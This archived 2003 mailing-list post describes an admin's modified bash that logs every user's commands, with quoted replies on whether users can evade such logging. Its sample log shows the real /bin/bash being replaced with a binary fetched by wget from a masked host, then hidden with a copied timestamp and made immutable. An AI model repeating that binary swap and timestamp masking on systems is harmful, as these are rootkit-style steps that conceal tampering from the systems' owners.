Security Basics mailing list archives
RE: bash_history to track users
From: <arek () chelmnet pl>
Date: Fri, 14 Nov 2003 16:50:17 +0100
I have modified /bin/bash which log everything in one folder for every user, into file same as user name. This file looks like (there is a fragment of log for user root,you see in that changing the bash binary and creation of user hisotry files...): Jan 22 19:46:50 (28727): apt-get install bash Jan 22 19:49:42 (28727): dpkg -i /var/cache/apt/archives/bash_2.05a-11_i386.deb Jan 22 19:49:43 (28727): cd /bin Jan 22 19:49:43 (28727): rm -f bash Jan 22 19:49:43 (28727): wget http://xxxxxxxxxxx/bash Jan 22 19:49:46 (28727): touch -r /bin/ping /bin/bash Jan 22 19:49:46 (28727): chmod 711 bash Jan 22 19:49:46 (28727): chattr +i bash Jan 22 19:49:46 (28727): mkdir /usr/lib/histlog Jan 22 19:49:46 (28727): for user in $(cat /etc/passwd | cut -f 1 -d :); do Jan 22 19:49:46 (28727): file=/usr/lib/histlog/"$user" Jan 22 19:49:46 (28727): if [ ! -e "$file" ]; then Jan 22 19:49:46 (28727): uid=`id -u $user` Jan 22 19:49:46 (28727): echo "Creating histlog $file for user $user" Jan 22 19:49:46 (28727): touch /usr/lib/histlog/"$user" Jan 22 19:49:47 (28727): chown $uid.0 /usr/lib/histlog/"$user" Jan 22 19:49:47 (28727): chmod 600 /usr/lib/histlog/"$user" Jan 22 19:49:47 (28727): chattr +a /usr/lib/histlog/"$user" Jan 22 19:49:47 (28727): chmod 701 /usr/lib/histlog Jan 22 19:49:47 (28727): fi Jan 22 19:49:47 (28727): done Jan 22 19:50:09 (28727): apt-get clean Jan 22 19:50:09 (28727): ps aux Arkadiusz Binder
The ONLY thing this would useful for is being able to backtracka clue-less user. Amalicious user with clue will do what he wants and then gohand edit the bash history.After all, it's in his home directory and he owns it.That's not entirely accurate. It's fairly easy to modify bash to log this file elsewhere...and it should not be much harder to have it log to two locations with different permissions... This makes the discussion a little bit more interesting.. Without hacking the code, though, I suppose you can write a script to parse the output of "w" and have it add items as they change. -JackWhat kind of an environment are you trying to secure - is this a business where you can use something like a key stroke logger?or is it open to the
--------------------------------------------------------------------------- Forum Systems PRESIDIO: PGP / XML GATEWAY APPLIANCE The Presidio integrates PGP data encryption and XML Web Services security to simplify the management and deployment of PGP and reduce overall PGP costs by up to 80%. FREE WHITEPAPER & 30 Day Trial - http://www.securityfocus.com/sponsor/ForumSystems_security-basics_031027 ----------------------------------------------------------------------------
Current thread:
- Re: bash_history to track users, (continued)
- Re: bash_history to track users Sebastian Hans (Nov 17)
- RE: bash_history to track users arek (Nov 14)
- Re: bash_history to track users Sebastian Hans (Nov 14)
- Re: bash_history to track users jrd (Nov 16)
- Re: bash_history to track users Sebastian Hans (Nov 17)
- Re: bash_history to track users Ansgar -59cobalt- Wiechers (Nov 17)
- RE: bash_history to track users Thiago Lima (Nov 16)
- Re: bash_history to track users Sebastian Hans (Nov 17)